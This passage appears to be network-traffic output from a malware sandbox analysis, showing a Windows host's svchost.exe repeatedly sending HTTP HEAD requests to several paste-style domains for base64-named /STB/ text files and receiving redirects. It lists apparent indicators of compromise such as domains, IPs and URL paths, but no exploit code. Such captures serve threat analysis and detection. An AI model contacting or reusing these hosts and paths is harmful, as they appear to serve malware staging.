                                                              Jan 12, 2025 09:27:22.121372938 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:22 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HIpDID9ZOQ3da1Wjk0oNywcHfJ711VxUl1i7mSrHFdX0ViUp%2F1wQ1zTUn9ePWsORjQ1t5LbuR63IDyOSOSH0bKnyAEF8li0GdHaQKtKZ2FIWROV7WMD2xE2vwBm9jZhQpwQm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc456f8f1c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              125 | 192.168.2.7 | 50343 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:21.739140987 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:22.195008039 CET | 878 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:22 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLTuH%2BgIK%2BCbyn%2Bi4eyQ%2FSRxz%2BomlZgy3Qx43MEbnevFzlSO9XP1vhg6d%2FYv%2BtOtR%2B7yEFLH%2FHek1fSRnFazsVoSql4eki0ZCTiHwUzXqjOpabgTw0%2FB%2FFml80qQMcO%2B"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc457697b78e7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1992&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              126 | 192.168.2.7 | 50348 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:22.201083899 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:22.687138081 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:22 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fqN5ASdC5UoQVas3TZlMYJ%2BNIDTAEiw5x8%2FPu0L69B76YmlGMN864aKfVSsEJI9u2kfKKPAP3pMwrnmj10XXiCmTx2fSTiJFihW4fZAog%2FtZKFNNqy%2FJ7yp%2BjfKCxcKbAgxE"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45a79e2efa3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1894&min_rtt=1894&rtt_var=947&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=120&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              127 | 192.168.2.7 | 50350 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:22.600091934 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:23.078497887 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7vjE9TOt5Ij1C2XtC4tvvVNY4owSRMJFfvXpSx2J%2F9Zp9VC55kJMLUXsDGyiKj1ClblBz6obf4uWPS9cN7luUesGhRdavi4nXa9KA2T2H85qgoXYJLG0vjheXcFwoGgTFaI%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45ceb7d8c84-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1803&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              128 | 192.168.2.7 | 50352 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:22.693713903 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:23.140355110 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tp270G49909mn8TgL60VK%2FkKW8fv7a8v0xv2Uy6x%2Fsu7yvFKpaxoUswzQB41Qd5WbQyFVlFScG8NgXhr2Q%2FHt98GUm543gkxty02YJRXMnW1emkQRlimJ3EVPcJslSS%2Fv7NI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45d59014414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1758&rtt_var=879&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              129 | 192.168.2.7 | 50354 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:23.085103035 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:23.561980009 CET | 866 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwiyjHda8MPCbxcocMZ5%2BCB8vBaICv5qmgV3AYkDm3ofeqrQc0%2F0QdQuF27llX%2BAFngxqn0q81f%2BDUqaSCSPwvCmCXICmz%2BLjCo3yZUf2b60BuA%2B40DSGLlT0cvdVOZ9"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc45fe9dd0cb2-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1453&min_rtt=1453&rtt_var=726&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              130 | 192.168.2.7 | 50359 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:23.568573952 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.042653084 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:23 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rf%2F9UZn9nNxDDNHcQ11EGEj6%2BAssP2wPuC29D3C7QyQwcfFGgmcA4GRBURCdo6cm04OkMwfauJNgR%2BnGIJarKS1oZ9dOSlFiSGfSDyGvcqv9ja1GqZeg5i%2BSgtqMnI1xx06l"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc462ec4943e0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1589&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              131 | 192.168.2.7 | 50361 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:23.623661995 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.096158028 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:24 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QJkz927y1LokFB%2B2ggUFybLb5TdOnRDFDTSDlwrfcgCKd%2Fhcl9oa09PtV6Ynd8rHnRFijL1KlVxW5LSauReoB0sPuMO%2B5%2FdDcw%2B5m%2FnJqbnwT1HYx8ZEoKKWWQozCfhWtrU%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4634e3d422d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2094&min_rtt=2094&rtt_var=1047&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              132 | 192.168.2.7 | 50363 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:24.049115896 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.528991938 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:24 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOQ2qjizsd7lP8ZyPCBqgmog6dTBplEN88%2BuBXg6FfnmnAgRMK7WkAnhsh6xYUlw5LdRlZBZJlDfKYq3MTTSGfSldEvvpy0stiaWaTcaF6%2FVMuVp6kZfEMatmKdkDiml2JKL"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc465fe4ec358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1655&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              133 | 192.168.2.7 | 50365 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:24.102838039 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:24.561486006 CET | 860 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:24 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FqcwqU7Ex6UgsRAIjZuTde8n59xmHSg%2FqXpGtME7NpTh7YnvkY7N1HnAIE4qAX1RdOiVHeOXEk9UnW1at13jtfglL3kVKjM396UIEjwdEtI%2BDSLjaAYgKvcfV3iMr1g"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46629526a58-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              134 | 192.168.2.7 | 50370 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:24.567773104 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.106439114 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPkLz73Qf7Re9GvuSzmLC5epbvfVAS9GCfZM3XS%2F9bS3V2g4fFMmRNQ1oLPqrF9tPBuytaSHjc7MI1d4A9cv9saS%2BqWLuU%2BKbAko2aiIgo9GjAF5slNHxqnHm7BU7tic7F82"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4698c7a42fc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1544&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              135 | 192.168.2.7 | 50372 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:25.033137083 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.508781910 CET | 866 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nizsywT2DTZ0HNbtUubXVmZXX9f1ZAnDtPQZQsrh7iFS2UwOwDAGx6KS8GO2qXoJoao3rLnGKsQtWG6t3vYDniKQDR3QkQ8Frv9OUU5cGoLM8FZb0xhigoUH4fdNV8zVphg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46c1e1a5590-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1619&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              136         192.168.2.7  50374        104.21.64.1     80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:25.121336937 CET  91                 OUT        HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.582278013 CET  873                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOH32z1mJJxlWJWp3R2RfflY0baplaeLFbwXx0US031dyLF03Qd97yDm43WeBurFCwIlznOX0rMBHFtUSAM1X%2FCbA%2Fboy0sfk7yYBcVLnLgZz1MHRQ0esrH1dIpETnxX2ABu"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46c8ac64414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              137         192.168.2.7  50376        172.67.198.113  80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:25.515604019 CET  80                 OUT        HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:25.968350887 CET  862                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:25 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cpd6dgINEwJOUZvfCBdF5iN7DgTvMtnpsUJFrps5doIZ2jtq64Yj4JgIA6SBNf%2FEP6i3pnacGGD66s%2BSP76kBJt0WG2x%2Beuoh9VLhXjITmsxuRSta4vdPWC%2BGD5sG6LG"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc46ef9025e79-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              138         192.168.2.7  50381        172.67.176.186  80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:25.974822998 CET  87                 OUT        HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:26.428056955 CET  875                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DVvmvsT%2BNaKYGKKY7cZy8ikvuaaadjEsCk9J1wKjvparXhEibSBf7JEpMm7%2BVWLJ12agSvhvv%2FybUwL%2BE%2F9FzCshmW25VEHC7AaSQUDRav22j0UI5z9DfphArutTZQTxqQwd"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc471dff34386-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              139         192.168.2.7  50383        188.114.97.3    80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:26.079870939 CET  86                 OUT        HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:26.560540915 CET  874                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mcw8jGtsBdqBB%2FHy%2FB9J3xl7QhGCaJCO3QtUwkVYNroQgtCtk3X9jtn%2BNoadFil4bMfWhk5LvIxb15AtJDljbQWbJKjpG1RBSOvG41ZvKcq%2BnSfYjOSVdnUv3HeYwCW6Tn8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc472ad06423d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1658&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              140         192.168.2.7  50385        104.21.64.1     80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:26.434784889 CET  91                 OUT        HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:26.884705067 CET  875                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDu5eWdH37eJaFoSYft1tBDKJBkiCUfgTIhDIABQp2kaa4Tr4wM0GXRd7AZVGOtnvG3XV2t6P%2FdMmVOImub3%2B9dK60746npEfMfXf4m7c3gyVMMeHJ7yTO1xay%2FdoYkpgSEc"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc474bd82de95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1603&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              141         192.168.2.7  50387        172.67.198.113  80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:26.566898108 CET  80                 OUT        HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.024802923 CET  860                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:26 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:26 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
